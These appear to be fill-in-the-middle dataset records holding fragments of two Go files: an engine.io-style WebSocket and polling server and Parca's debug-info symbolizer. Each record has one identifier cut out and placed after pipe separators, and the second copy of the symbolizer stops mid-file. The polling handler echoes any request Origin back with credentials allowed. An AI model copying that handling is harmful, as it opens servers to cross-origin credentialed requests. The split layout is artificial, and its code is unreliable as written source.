// Protocol error codes and mappings.
errorTransportUnknown = 0
errorUnknownSID = 1
errorBadHandshakeMethod = 2
errorBadRequest = 3
// Query parameters used in client requests.
paramTransport = "transport"
paramSessionID = "sid"
// Available transports.
transportWebSocket = "websocket"
transportPolling = "polling"
// The default time before closed connections are cleaned from
// the client pool.
clientReapTimeout = 5 * time.Second
)
var errorMessage = map[int]string{
errorTransportUnknown: "Transport unknown",
errorUnknownSID: "Session ID unknown",
errorBadHandshakeMethod: "Bad handshake method",
errorBadRequest: "Bad request",
}
var (
validTransports = map[string]bool{
transportWebSocket: true,
transportPolling: true,
}
validUpgrades = map[string]bool{
transportWebSocket: true,
}
)
// getValidUpgrades returns a slice containing the valid protocols
// that a connection can upgrade to.
func getValidUpgrades() []string {
upgrades := make([]string, len(validUpgrades))
i := 0
for u := range validUpgrades {
upgrades[i] = u
i++
}
return upgrades
}
// A Handler is called by the server when a connection is
// opened successfully.
type Handler func(*Conn)
type server struct {
// Handler handles an FTC connection.
Handler
basePath string
cookieName string
clients *clientSet // The set of connections (some may be closed).
wsServer *websocket.Server // The underlying WebSocket server.
}
// The defaults for options passed to the server.
const (
defaultBasePath = "/engine.io/"
defaultCookieName = "io"
)
// Options are the parameters passed to the server.
type Options struct {
// BasePath is the base URL path that the server handles requests for.
BasePath string
// CookieName is the name of the cookie set upon successful handshake.
CookieName string
}
// NewServer allocates and returns a new server with the given
// options and handler. If nil options are passed, the defaults
// specified in the constants above are used instead.
func NewServer(o *Options, h Handler) *server {
opts := Options{}
if o != nil {
opts = *o
}
if len(opts.BasePath) == 0 {
opts.BasePath = defaultBasePath
}
if len(opts.CookieName) == 0 {
opts.CookieName = defaultCookieName
}
s := &server{
Handler: h,
basePath: opts.BasePath,
cookieName: opts.CookieName,
clients: &clientSet{clients: map[string]*conn{}},
}
go s.startReaper()
s.wsServer = &websocket.Server{Handler: s.wsHandler}
return s
}
// startReaper continuously removes closed connections from the
// client set via the reap function.
func (s *server) startReaper() {
for {
if s.clients == nil {
glog.Fatal("server cannot have a nil client set")
}
s.clients.reap()
numClients.Set(int64(s.clients.len()))
time.Sleep(clientReapTimeout)
}
}
// handlePacket takes the given packet and writes the appropriate
// response to the given connection.
func (s *server) handlePacket(p packet, c *conn) error {
glog.Infof("handling packet type: %c, data: %s, upgraded: %t", p.typ, p.data, c.upgraded())
var encode func(packet) error
if c.upgraded() {
encode = newPacketEncoder(c).encode
} else {
encode = func(pkt packet) error {
return newPayloadEncoder(c).encode([]packet{pkt})
}
}
switch p.typ {
case packetTypePing:
return encode(packet{typ: packetTypePong, data: p.data})
case packetTypeMessage:
if c.pubConn != nil {
c.pubConn.onMessage(p.data)
}
case packetTypeClose:
c.Close()
}
return nil
}
// wsHandler continuously receives on the given WebSocket
// connection and delegates the packets received to the
// appropriate handler functions.
func (s *server) wsHandler(ws *websocket.Conn) {
// If the client initially attempts to connect directly using
// WebSocket transport, the session ID parameter will be empty.
// Otherwise, the connection with the given session ID will
// need to be upgraded.
glog.Infoln("Starting websocket handler...")
var c *conn
wsEncoder, wsDecoder := newPacketEncoder(ws), newPacketDecoder(ws)
for {
if c != nil {
var pkt packet
if err := wsDecoder.decode(&pkt); err != nil {
glog.Errorf("could not decode packet: %v", err)
break
}
glog.Infof("WS: got packet type: %c, data: %s", pkt.typ, pkt.data)
if pkt.typ == packetTypeUpgrade {
// Upgrade the connection to use this WebSocket Conn.
c.upgrade(ws)
continue
}
if err := s.handlePacket(pkt, c); err != nil {
glog.Errorf("could not handle packet: %v", err)
break
}
continue
}
id := ws.Request().FormValue(paramSessionID)
c = s.clients.get(id)
if len(id) > 0 && c == nil {
serverError(ws, errorUnknownSID)
break
} else if len(id) > 0 && c != nil {
// The initial handshake requires a ping (2) and pong (3) echo.
var pkt packet
if err := wsDecoder.decode(&pkt); err != nil {
glog.Errorf("could not decode packet: %v", err)
continue
}
glog.Infof("WS: got packet type: %c, data: %s", pkt.typ, pkt.data)
if pkt.typ == packetTypePing {
glog.Infof("got ping packet with data %s", pkt.data)
if err := wsEncoder.encode(packet{typ: packetTypePong, data: pkt.data}); err != nil {
glog.Errorf("could not encode pong packet: %v", err)
continue
}
// Force a polling cycle to ensure a fast upgrade.
glog.Infoln("forcing polling cycle")
payload := []packet{packet{typ: packetTypeNoop}}
if err := newPayloadEncoder(c).encode(payload); err != nil {
glog.Errorf("could not encode packet to force polling cycle: %v", err)
continue
}
}
} else if len(id) == 0 && c == nil {
// Create a new connection with this WebSocket Conn.
c = newConn()
c.ws = ws
s.clients.add(c)
b, err := handshakeData(c)
if err != nil {
glog.Errorf("could not get handshake data: %v", err)
}
if err := wsEncoder.encode(packet{typ: packetTypeOpen, data: b}); err != nil {
glog.Errorf("could not encode open packet: %v", err)
break
}
if s.Handler != nil {
go s.Handler(c.pubConn)
}
}
}
glog.Infof("closing websocket connection %p", ws)
c.Close()
}
// pollingHandler handles all XHR polling requests to the server, initiating
// a handshake if the request’s session ID does not already exist within
// the client set.
func (s *server) pollingHandler(w http.ResponseWriter, r *http.Request) {
setPollingHeaders(w, r)
id := r.FormValue(paramSessionID)
if len(id) > 0 {
c := s.clients.get(id)
if c == nil {
serverError(w, errorUnknownSID)
return
}
if r.Method == "POST" {
var payload []packet
if err := newPayloadDecoder(r.Body).decode(&payload); err != nil {
http.Error(w, err.Error(), http.StatusInternalServerError)
return
}
defer r.Body.Close()
for _, pkt := range payload {
s.handlePacket(pkt, c)
}
fmt.Fprintf(w, "ok")
return
} else if r.Method == "GET" {
glog.Infoln("GET request xhr polling data...")
// TODO(andybons): Requests can pile up, here. Drain the conn and
// then write the payload.
if _, err := io.Copy(w, c); err != nil {
http.Error(w, err.Error(), http.StatusInternalServerError)
return
}
return
}
http.Error(w, http.StatusText(http.StatusBadRequest), http.StatusBadRequest)
return
}
s.pollingHandshake(w, r)
}
// pollingHandshake creates a new FTC Conn with the given HTTP Request and
// ResponseWriter, setting a persistence cookie if necessary and calling
// the server’s Handler.
func (s *server) pollingHandshake(w http.ResponseWriter, r *http.Request) {
c := newConn()
s.clients.add(c)
if len(s.cookieName) > 0 {
http.SetCookie(w, &http.Cookie{
Name: s.cookieName,
Value: c.id,
})
}
b, err := handshakeData(c)
if err != nil {
glog.Errorf("could not get handshake data: %v", err)
}
payload := []packet{packet{typ: packetTypeOpen, data: b}}
if err := newPayloadEncoder(w).encode(payload); err != nil {
glog.Errorf("could not encode open payload: %v", err)
return
}
if s.Handler != nil {
go s.Handler(c.pubConn)
}
}
// ServeHTTP implements the http.Handler interface for an FTC Server.
func (s *server) ServeHTTP(w http.ResponseWriter, r *http.Request) {
remoteAddr := r.Header.Get("X-Forwarded-For")
if len(remoteAddr) == 0 {
remoteAddr = r.RemoteAddr
}
glog.Infof("%s (%s) %s %s %s", r.Proto, r.Header.Get("X-Forwarded-Proto"), r.Method, remoteAddr, r.URL)
transport := r.FormValue(paramTransport)
if strings.HasPrefix(r.URL.Path, s.basePath) && !validTransports[transport] {
serverError(w, errorTransportUnknown)
return
}
if transport == transportWebSocket {
s.wsServer.ServeHTTP(w, r)
} else if transport == transportPolling {
s.pollingHandler(w, r)
}
}
// handshakeData returns the JSON encoded data needed
// for the initial connection handshake.
func hand | conn) ([]byte, error) {
return json.Marshal(map[string]interface{}{
"pingInterval": 25000,
"pingTimeout": 60000,
"upgrades": getValidUpgrades(),
"sid": c.id,
})
}
// serverError sends a JSON-encoded message to the given io.Writer
// with the given error code.
func serverError(w io.Writer, code int) {
if rw, ok := w.(http.ResponseWriter); ok {
rw.Header().Set("Content-Type", "application/json")
rw.WriteHeader(http.StatusBadRequest)
}
msg := struct {
Code int `json:"code"`
Message string `json:"message"`
}{
Code: code,
Message: errorMessage[code],
}
if err := json.NewEncoder(w).Encode(msg); err != nil {
glog.Errorln("error encoding error msg %+v: %s", msg, err)
return
}
glog.Errorf("wrote server error: %+v", msg)
}
// setPollingHeaders sets the appropriate headers when responding
// to an XHR polling request.
func setPollingHeaders(w http.ResponseWriter, r *http.Request) {
origin := r.Header.Get("Origin")
if len(origin) > 0 {
w.Header().Set("Access-Control-Allow-Credentials", "true")
} else {
origin = "*"
}
w.Header().Set("Access-Control-Allow-Origin", origin)
w.Header().Set("Connection", "keep-alive")
w.Header().Set("Content-Type", "text/plain; charset=UTF-8")
}
| shakeData(c * | identifier_name |
symbolizer.go | // Copyright 2022-2023 The Parca Authors
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
package symbolizer
import (
"context"
"debug/elf"
"errors"
"fmt"
"io"
"os"
"path/filepath"
"strings"
"time"
"github.com/go-kit/log"
"github.com/go-kit/log/level"
"github.com/prometheus/client_golang/prometheus"
"github.com/prometheus/client_golang/prometheus/promauto"
debuginfopb "github.com/parca-dev/parca/gen/proto/go/parca/debuginfo/v1alpha1"
pb "github.com/parca-dev/parca/gen/proto/go/parca/metastore/v1alpha1"
"github.com/parca-dev/parca/pkg/debuginfo"
"github.com/parca-dev/parca/pkg/profile"
"github.com/parca-dev/parca/pkg/runutil"
"github.com/parca-dev/parca/pkg/symbol/addr2line"
"github.com/parca-dev/parca/pkg/symbol/demangle"
"github.com/parca-dev/parca/pkg/symbol/elfutils"
)
var (
ErrNotValidElf = errors.New("not a valid ELF file")
ErrNoDebuginfo = errors.New("no debug info found")
ErrLinerFailed = errors.New("liner creation failed")
)
type DebuginfoMetadata interface {
SetQuality(ctx context.Context, buildID string, typ debuginfopb.DebuginfoType, quality *debuginfopb.DebuginfoQuality) error
Fetch(ctx context.Context, buildID string, typ debuginfopb.DebuginfoType) (*debuginfopb.Debuginfo, error)
}
// liner is the interface implemented by symbolizers
// which read an object file (symbol table or debug information) and return
// source code lines by a given memory address.
type liner interface {
PCToLines(pc uint64) ([]profile.LocationLine, error)
PCRange() ([2]uint64, error)
Close() error
File() string
}
type Option func(*Symbolizer)
func WithAttemptThreshold(t int) Option {
return func(s *Symbolizer) {
s.attemptThreshold = t
}
}
func WithDemangleMode(mode string) Option {
return func(s *Symbolizer) {
s.demangler = demangle.NewDemangler(mode, false)
}
}
type Symbolizer struct {
logger log.Logger
// attempts counts the total number of symbolication attempts.
// It counts per batch.
attempts prometheus.Counter
// errors counts the total number of symbolication errors, partitioned by an error reason
// such as failure to fetch unsymbolized locations.
// It counts per batch.
errors *prometheus.CounterVec
// duration is a histogram to measure how long it takes to finish a symbolication round.
// Note, a single observation is per batch.
duration prometheus.Histogram
// storeDuration is a histogram to measure how long it takes to store the symbolized locations.
// Note, a single observation is per batch.
storeDuration prometheus.Histogram
metastore pb.MetastoreServiceClient
debuginfo DebuginfoFetcher
metadata DebuginfoMetadata
demangler *demangle.Demangler
attemptThreshold int
linerCreationFailed map[string]struct{}
symbolizationAttempts map[string]map[uint64]int
symbolizationFailed map[string]map[uint64]struct{}
pcRanges map[string][2]uint64
linerCache map[string]liner
batchSize uint32
tmpDir string
}
type DebuginfoFetcher interface {
// Fetch ensures that the debug info for the given build ID is available on
// a local filesystem and returns a path to it.
FetchDebuginfo(ctx context.Context, dbginfo *debuginfopb.Debuginfo) (io.ReadCloser, error)
}
func New(
logger log.Logger,
reg prometheus.Registerer,
metadata DebuginfoMetadata,
metastore pb.MetastoreServiceClient,
debuginfo DebuginfoFetcher,
tmpDir string,
batchSize uint32,
opts ...Option,
) *Symbolizer {
attemptsTotal := promauto.With(reg).NewCounter(
prometheus.CounterOpts{
Name: "parca_symbolizer_symbolication_attempts_total",
Help: "Total number of symbolication attempts in batches.",
},
)
errorsTotal := promauto.With(reg).NewCounterVec(
prometheus.CounterOpts{
Name: "parca_symbolizer_symbolication_errors_total",
Help: "Total number of symbolication errors in batches, partitioned by an error reason.",
},
[]string{"reason"},
)
duration := promauto.With(reg).NewHistogram(
prometheus.HistogramOpts{
Name: "parca_symbolizer_symbolication_duration_seconds",
Help: "How long it took in seconds to finish a round of the symbolication cycle in batches.",
Buckets: []float64{0.001, 0.01, 0.1, 0.3, 0.6, 1, 3, 6, 9, 20, 30, 60, 90, 120},
},
)
storeDuration := promauto.With(reg).NewHistogram(
prometheus.HistogramOpts{
Name: "parca_symbolizer_store_duration_seconds",
Help: "How long it took in seconds to store a batch of the symbolized locations.",
Buckets: []float64{0.001, 0.01, 0.1, 0.3, 0.6, 1, 3, 6, 9, 20, 30, 60, 90, 120},
},
)
const (
defaultDemangleMode = "simple"
defaultAttemptThreshold = 3
)
s := &Symbolizer{
logger: log.With(logger, "component", "symbolizer"),
attempts: attemptsTotal,
errors: errorsTotal,
duration: duration,
storeDuration: storeDuration,
metastore: metastore,
debuginfo: debuginfo,
tmpDir: tmpDir,
batchSize: batchSize,
metadata: metadata,
demangler: demangle.NewDemangler(defaultDemangleMode, false),
attemptThreshold: defaultAttemptThreshold,
linerCreationFailed: map[string]struct{}{},
symbolizationAttempts: map[string]map[uint64]int{},
symbolizationFailed: map[string]map[uint64]struct{}{},
pcRanges: map[string][2]uint64{},
}
for _, opt := range opts {
opt(s)
}
return s
}
func (s *Symbolizer) Run(ctx context.Context, interval time.Duration) error {
return runutil.Repeat(interval, ctx.Done(), func() error {
level.Debug(s.logger).Log("msg", "start symbolization cycle")
s.runSymbolizationCycle(ctx)
level.Debug(s.logger).Log("msg", "symbolization loop completed")
return nil
})
}
func (s *Symbolizer) runSymbolizationCycle(ctx context.Context) {
var begin time.Time
prevMaxKey := ""
for {
begin = time.Now()
s.attempts.Inc()
lres, err := s.metastore.UnsymbolizedLocations(ctx, &pb.UnsymbolizedLocationsRequest{
Limit: s.batchSize,
MinKey: prevMaxKey,
})
if err != nil {
level.Error(s.logger).Log("msg", "failed to fetch unsymbolized locations", "err", err)
s.errors.WithLabelValues("fetch_unsymbolized_locations").Inc()
s.duration.Observe(time.Since(begin).Seconds())
// Try again on the next cycle.
return
}
if len(lres.Locations) == 0 {
s.duration.Observe(time.Since(begin).Seconds())
// Nothing to symbolize.
return
}
prevMaxKey = lres.MaxKey
err = s.Symbolize(ctx, lres.Locations)
if err != nil {
level.Debug(s.logger).Log("msg", "errors occurred during symbolization", "err", err)
}
s.duration.Observe(time.Since(begin).Seconds())
if s.batchSize == 0 {
// If batch size is 0 we won't continue with the next batch as we
// should have already processed everything.
return
}
}
}
// UnsymbolizableMapping returns true if a mapping points to a binary for which
// locations can't be symbolized in principle, at least now. Examples are
// "[vdso]", [vsyscall]" and some others, see the code.
func UnsymbolizableMapping(m *pb.Mapping) bool {
name := filepath.Base(m.File)
return strings.HasPrefix(name, "[") || strings.HasPrefix(name, "linux-vdso") || strings.HasPrefix(m.File, "/dev/dri/")
}
type MappingLocations struct {
Mapping *pb.Mapping
Locations []*pb.Location
// LocationsLines is a list of lines per location.
LocationsLines [][]profile.LocationLine
}
func (s *Symbolizer) Symbolize(ctx context.Context, locations []*pb.Location) error {
mappingsIndex := map[string]int{}
mappingIDs := []string{}
for _, loc := range locations {
if _, ok := mappingsIndex[loc.MappingId]; !ok {
mappingIDs = append(mappingIDs, loc.MappingId)
mappingsIndex[loc.MappingId] = len(mappingIDs) - 1
}
}
mres, err := s.metastore.Mappings(ctx, &pb.MappingsRequest{MappingIds: mappingIDs})
if err != nil {
s.errors.WithLabelValues("get_mappings").Inc()
return fmt.Errorf("get mappings: %w", err)
}
// Aggregate locations per mapping to get prepared for batch request.
locationsByMappings := make([]*MappingLocations, len(mres.Mappings))
for i, m := range mres.Mappings {
locationsByMappings[i] = &MappingLocations{Mapping: m}
}
for _, loc := range locations {
locationsByMapping := locationsByMappings[mappingsIndex[loc.MappingId]]
// Already symbolized!
if loc.Lines != nil && len(loc.Lines) > 0 {
level.Debug(s.logger).Log("msg", "location already symbolized, skipping")
continue
}
locationsByMapping.Locations = append(locationsByMapping.Locations, loc)
}
newLinerCache := map[string]liner{}
for _, locationsByMapping := range locationsByMappings {
mapping := locationsByMapping.Mapping
// If Mapping or Mapping.BuildID is empty, we cannot associate an object file with functions.
if mapping == nil || len(mapping.BuildId) == 0 || UnsymbolizableMapping(mapping) {
level.Debug(s.logger).Log("msg", "mapping of location is empty, skipping")
continue
}
logger := log.With(s.logger, "buildid", mapping.BuildId)
var liner liner
locations := locationsByMapping.Locations
// Symbolize returns a list of lines per location passed to it.
locationsByMapping.LocationsLines, liner, err = s.symbolizeLocationsForMapping(ctx, mapping, locations)
if err != nil {
level.Debug(logger).Log("msg", "storage symbolization request failed", "err", err)
continue
}
if liner != nil {
newLinerCache[mapping.BuildId] = liner
}
}
for k := range newLinerCache {
delete(s.linerCache, k)
}
for _, liner := range s.linerCache {
// These are liners that didn't show up in the latest iteration.
if err := liner.Close(); err != nil {
level.Debug(s.logger).Log("msg", "failed to close liner", "err", err)
}
if err := os.Remove(liner.File()); err != nil {
level.Debug(s.logger).Log("msg", "failed to remove liner file", "err", err)
}
}
s.linerCache = newLinerCache
numFunctions := 0
for _, locationsByMapping := range locationsByMappings {
for _, locationLines := range locationsByMapping.LocationsLines {
numFunctions += len(locationLines)
}
}
if numFunctions == 0 {
return nil
}
functions := make([]*pb.Function, numFunctions)
numLocations := 0
i := 0
for _, locationsByMapping := range locationsByMappings {
for _, locationLines := range locationsByMapping.LocationsLines {
if len(locationLines) == 0 {
continue
}
numLocations++
for _, line := range locationLines {
functions[i] = line.Function
i++
}
}
}
fres, err := s.metastore.GetOrCreateFunctions(ctx, &pb.GetOrCreateFunctionsRequest{Functions: functions})
if err != nil {
s.errors.WithLabelValues("get_or_create_functions").Inc()
return fmt.Errorf("get or create functions: %w", err)
}
locations = make([]*pb.Location, 0, numLocations)
i = 0
for _, locationsByMapping := range locationsByMappings {
for j, locationLines := range locationsByMapping.LocationsLines {
if len(locationLines) == 0 {
continue
}
lines := make([]*pb.Line, 0, len(locationLines))
for _, line := range locationLines {
lines = append(lines, &pb.Line{
FunctionId: fres.Functions[i].Id,
Line: line.Line,
})
i++
}
// Update the location with the lines in-place so that in the next
// step we can just reuse the same locations as were originally
// passed in.
locations = append(locations, locationsByMapping.Locations[j])
locationsByMapping.Locations[j].Lines = lines
}
}
// At this point the locations are symbolized in-place and we can send them to the metastore.
defer func(begin time.Time) {
s.storeDuration.Observe(time.Since(begin).Seconds())
}(time.Now())
_, err = s.metastore.CreateLocationLines(ctx, &pb.CreateLocationLinesRequest{
Locations: locations,
})
if err != nil {
s.errors.WithLabelValues("create_location_lines").Inc()
return fmt.Errorf("create location lines: %w", err)
}
return nil
}
// symbolizeLocationsForMapping fetches the debug info for a given build ID and symbolizes it the
// given location.
func (s *Symbolizer) symbolizeLocationsForMapping(ctx context.Context, m *pb.Mapping, locations []*pb.Location) ([][]profile.LocationLine, liner, error) {
dbginfo, err := s.metadata.Fetch(ctx, m.BuildId, debuginfopb.DebuginfoType_DEBUGINFO_TYPE_DEBUGINFO_UNSPECIFIED)
if err != nil {
return nil, nil, fmt.Errorf("fetching metadata: %w", err)
}
if dbginfo.Quality != nil {
if dbginfo.Quality.NotValidElf {
return nil, nil, ErrNotValidElf
}
if !dbginfo.Quality.HasDwarf && !dbginfo.Quality.HasGoPclntab && !(dbginfo.Quality.HasSymtab || dbginfo.Quality.HasDynsym) {
return nil, nil, fmt.Errorf("check previously reported debuginfo quality: %w", ErrNoDebuginfo)
}
}
key := dbginfo.BuildId
countLocationsToSymbolize := s.countLocationsToSymbolize(key, locations)
if countLocationsToSymbolize == 0 {
pcRange := s.pcRanges[key]
level.Debug(s.logger).Log("msg", "no locations to symbolize", "build_id", m.BuildId, "pc_range_start", fmt.Sprintf("0x%x", pcRange[0]), "pc_range_end", fmt.Sprintf("0x%x", pcRange[1]))
return make([][]profile.LocationLine, len(locations)), nil, nil
}
liner, found := s.linerCache[key]
if !found {
switch dbginfo.Source {
case debuginfopb.Debuginfo_SOURCE_UPLOAD:
if dbginfo.Upload.State != debuginfopb.DebuginfoUpload_STATE_UPLOADED {
return nil, nil, debuginfo.ErrNotUploadedYet
}
case debuginfopb.Debuginfo_SOURCE_DEBUGINFOD:
// Nothing to do here, just covering all cases.
default:
return nil, nil, debuginfo.ErrUnknownDebuginfoSource
}
// Fetch the debug info for the build ID.
rc, err := s.debuginfo.FetchDebuginfo(ctx, dbginfo)
if err != nil {
return nil, nil, fmt.Errorf("fetch debuginfo (BuildID: %q): %w", m.BuildId, err)
}
defer func() {
if err := rc.Close(); err != nil {
level.Error(s.logger).Log("msg", "failed to close debuginfo reader", "err", err)
}
}()
f, err := os.CreateTemp(s.tmpDir, "parca-symbolizer-*")
if err != nil {
return nil, nil, fmt.Errorf("create temp file: %w", err)
}
defer func() {
if err := f.Close(); err != nil {
level.Error(s.logger).Log("msg", "failed to close debuginfo file", "err", err)
}
if err := os.Remove(f.Name()); err != nil {
level.Error(s.logger).Log("msg", "failed to remove debuginfo file", "err", err)
}
}()
_, err = io.Copy(f, rc)
if err != nil {
return nil, nil, fmt.Errorf("copy debuginfo to temp file: %w", err)
}
e, err := elf.Open(f.Name())
if err != nil {
if merr := s.metadata.SetQuality(ctx, m.BuildId, debuginfopb.DebuginfoType_DEBUGINFO_TYPE_DEBUGINFO_UNSPECIFIED, &debuginfopb.DebuginfoQuality{
NotValidElf: true,
}); merr != nil {
level.Error(s.logger).Log("msg", "failed to set metadata quality", "err", merr)
}
return nil, nil, fmt.Errorf("open temp file as ELF: %w", err)
}
defer func() {
if err := e.Close(); err != nil {
level.Error(s.logger).Log("msg", "failed to close debuginfo file", "err", err)
}
}()
if dbginfo.Quality == nil {
dbginfo.Quality = &debuginfopb.DebuginfoQuality{
HasDwarf: elfutils.HasDWARF(e),
HasGoPclntab: elfutils.HasGoPclntab(e),
HasSymtab: elfutils.HasSymtab(e),
HasDynsym: elfutils.HasDynsym(e),
}
if err := s.metadata.SetQuality(ctx, m.BuildId, debuginfopb.DebuginfoType_DEBUGINFO_TYPE_DEBUGINFO_UNSPECIFIED, dbginfo.Quality); err != nil {
return nil, nil, fmt.Errorf("set quality: %w", err)
}
if !dbginfo.Quality.HasDwarf && !dbginfo.Quality.HasGoPclntab && !(dbginfo.Quality.HasSymtab || dbginfo.Quality.HasDynsym) {
return nil, nil, fmt.Errorf("check debuginfo quality: %w", ErrNoDebuginfo)
}
}
liner, err = s.newLiner(f.Name(), e, dbginfo.Quality)
if err != nil {
return nil, nil, fmt.Errorf("new liner: %w", err)
}
}
pcRange, found := s.pcRanges[key]
if !found {
pcRange, err = liner.PCRange()
if err != nil {
return nil, liner, fmt.Errorf("get pc range: %w", err)
}
s.pcRanges[key] = pcRange
}
countLocationsToSymbolize = s.countLocationsToSymbolize(key, locations)
if countLocationsToSymbolize == 0 {
level.Debug(s.logger).Log("msg", "no locations to symbolize", "build_id", m.BuildId, "pc_range_start", fmt.Sprintf("0x%x", pcRange[0]), "pc_range_end", fmt.Sprintf("0x%x", pcRange[1]))
return make([][]profile.LocationLine, len(locations)), liner, nil
}
level.Debug(s.logger).Log("msg", "symbolizing locations", "build_id", m.BuildId, "count", countLocationsToSymbolize)
locationsLines := make([][]profile.LocationLine, len(locations))
for i, loc := range locations {
// Check if we already attempt to symbolize this location and failed.
// No need to try again.
if _, failedBefore := s.symbolizationFailed[dbginfo.BuildId][loc.Address]; failedBefore {
continue
}
if pcRange[0] <= loc.Address && loc.Address <= pcRange[1] {
locationsLines[i] = s.pcToLines(liner, key, loc.Address)
}
}
return locationsLines, liner, nil
}
func (s *Symbolizer) | (key string, locations []*pb.Location) int {
locationsToSymbolize := 0
for _, loc := range locations {
if _, failedBefore := s.symbolizationFailed[key][loc.Address]; failedBefore {
continue
}
pcRange, found := s.pcRanges[key]
if !found {
locationsToSymbolize++
continue
}
if pcRange[0] <= loc.Address && loc.Address <= pcRange[1] {
locationsToSymbolize++
}
}
return locationsToSymbolize
}
// newLiner creates a new liner for the given mapping and object file path.
func (s *Symbolizer) newLiner(filepath string, f *elf.File, quality *debuginfopb.DebuginfoQuality) (liner, error) {
switch {
case quality.HasDwarf:
lnr, err := addr2line.DWARF(s.logger, filepath, f, s.demangler)
if err != nil {
return nil, fmt.Errorf("failed to create DWARF liner: %w", err)
}
return lnr, nil
case quality.HasGoPclntab:
lnr, err := addr2line.Go(s.logger, filepath, f)
if err != nil {
return nil, fmt.Errorf("failed to create Go liner: %w", err)
}
return lnr, nil
// TODO CHECK plt
case quality.HasSymtab || quality.HasDynsym:
lnr, err := addr2line.Symbols(s.logger, filepath, f, s.demangler)
if err != nil {
return nil, fmt.Errorf("failed to create Symtab liner: %w", err)
}
return lnr, nil
default:
return nil, ErrLinerFailed
}
}
// pcToLines returns the line number of the given PC while keeping the track of symbolization attempts and failures.
func (s *Symbolizer) pcToLines(liner liner, key string, addr uint64) []profile.LocationLine {
lines, err := liner.PCToLines(addr)
level.Debug(s.logger).Log("msg", "symbolized location", "build_id", key, "address", addr, "lines_count", len(lines), "err", err, "liner_type", fmt.Sprintf("%T", liner))
if err != nil {
// Error bookkeeping.
if prev, ok := s.symbolizationAttempts[key][addr]; ok {
prev++
if prev >= s.attemptThreshold {
if _, ok := s.symbolizationFailed[key]; ok {
s.symbolizationFailed[key][addr] = struct{}{}
} else {
s.symbolizationFailed[key] = map[uint64]struct{}{addr: {}}
}
delete(s.symbolizationAttempts[key], addr)
} else {
s.symbolizationAttempts[key][addr] = prev
}
return nil
}
// First failed attempt.
s.symbolizationAttempts[key] = map[uint64]int{addr: 1}
return nil
}
if len(lines) == 0 {
if _, ok := s.symbolizationFailed[key]; ok {
s.symbolizationFailed[key][addr] = struct{}{}
} else {
s.symbolizationFailed[key] = map[uint64]struct{}{addr: {}}
}
delete(s.symbolizationAttempts[key], addr)
}
return lines
}
| countLocationsToSymbolize | identifier_name |
symbolizer.go | // Copyright 2022-2023 The Parca Authors
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
package symbolizer
import (
"context"
"debug/elf"
"errors"
"fmt"
"io"
"os"
"path/filepath"
"strings"
"time"
"github.com/go-kit/log"
"github.com/go-kit/log/level"
"github.com/prometheus/client_golang/prometheus"
"github.com/prometheus/client_golang/prometheus/promauto"
debuginfopb "github.com/parca-dev/parca/gen/proto/go/parca/debuginfo/v1alpha1"
pb "github.com/parca-dev/parca/gen/proto/go/parca/metastore/v1alpha1"
"github.com/parca-dev/parca/pkg/debuginfo"
"github.com/parca-dev/parca/pkg/profile"
"github.com/parca-dev/parca/pkg/runutil"
"github.com/parca-dev/parca/pkg/symbol/addr2line"
"github.com/parca-dev/parca/pkg/symbol/demangle"
"github.com/parca-dev/parca/pkg/symbol/elfutils"
)
var (
ErrNotValidElf = errors.New("not a valid ELF file")
ErrNoDebuginfo = errors.New("no debug info found")
ErrLinerFailed = errors.New("liner creation failed")
)
type DebuginfoMetadata interface {
SetQuality(ctx context.Context, buildID string, typ debuginfopb.DebuginfoType, quality *debuginfopb.DebuginfoQuality) error
Fetch(ctx context.Context, buildID string, typ debuginfopb.DebuginfoType) (*debuginfopb.Debuginfo, error)
}
// liner is the interface implemented by symbolizers
// which read an object file (symbol table or debug information) and return
// source code lines by a given memory address.
type liner interface {
PCToLines(pc uint64) ([]profile.LocationLine, error)
PCRange() ([2]uint64, error)
Close() error
File() string
}
type Option func(*Symbolizer)
func WithAttemptThreshold(t int) Option {
return func(s *Symbolizer) {
s.attemptThreshold = t
}
}
func WithDemangleMode(mode string) Option {
return func(s *Symbolizer) {
s.demangler = demangle.NewDemangler(mode, false)
}
}
type Symbolizer struct {
logger log.Logger
// attempts counts the total number of symbolication attempts.
// It counts per batch.
attempts prometheus.Counter
// errors counts the total number of symbolication errors, partitioned by an error reason
// such as failure to fetch unsymbolized locations.
// It counts per batch.
errors *prometheus.CounterVec
// duration is a histogram to measure how long it takes to finish a symbolication round.
// Note, a single observation is per batch.
duration prometheus.Histogram
// storeDuration is a histogram to measure how long it takes to store the symbolized locations.
// Note, a single observation is per batch.
storeDuration prometheus.Histogram
metastore pb.MetastoreServiceClient
debuginfo DebuginfoFetcher
metadata DebuginfoMetadata
demangler *demangle.Demangler
attemptThreshold int
linerCreationFailed map[string]struct{}
symbolizationAttempts map[string]map[uint64]int
symbolizationFailed map[string]map[uint64]struct{}
pcRanges map[string][2]uint64
linerCache map[string]liner
batchSize uint32
tmpDir string
}
type DebuginfoFetcher interface {
// Fetch ensures that the debug info for the given build ID is available on
// a local filesystem and returns a path to it.
FetchDebuginfo(ctx context.Context, dbginfo *debuginfopb.Debuginfo) (io.ReadCloser, error)
}
func New(
logger log.Logger,
reg prometheus.Registerer,
metadata DebuginfoMetadata,
metastore pb.MetastoreServiceClient,
debuginfo DebuginfoFetcher,
tmpDir string,
batchSize uint32,
opts ...Option,
) *Symbolizer {
attemptsTotal := promauto.With(reg).NewCounter(
prometheus.CounterOpts{
Name: "parca_symbolizer_symbolication_attempts_total",
Help: "Total number of symbolication attempts in batches.",
},
)
errorsTotal := promauto.With(reg).NewCounterVec(
prometheus.CounterOpts{
Name: "parca_symbolizer_symbolication_errors_total",
Help: "Total number of symbolication errors in batches, partitioned by an error reason.",
},
[]string{"reason"},
)
duration := promauto.With(reg).NewHistogram(
prometheus.HistogramOpts{
Name: "parca_symbolizer_symbolication_duration_seconds",
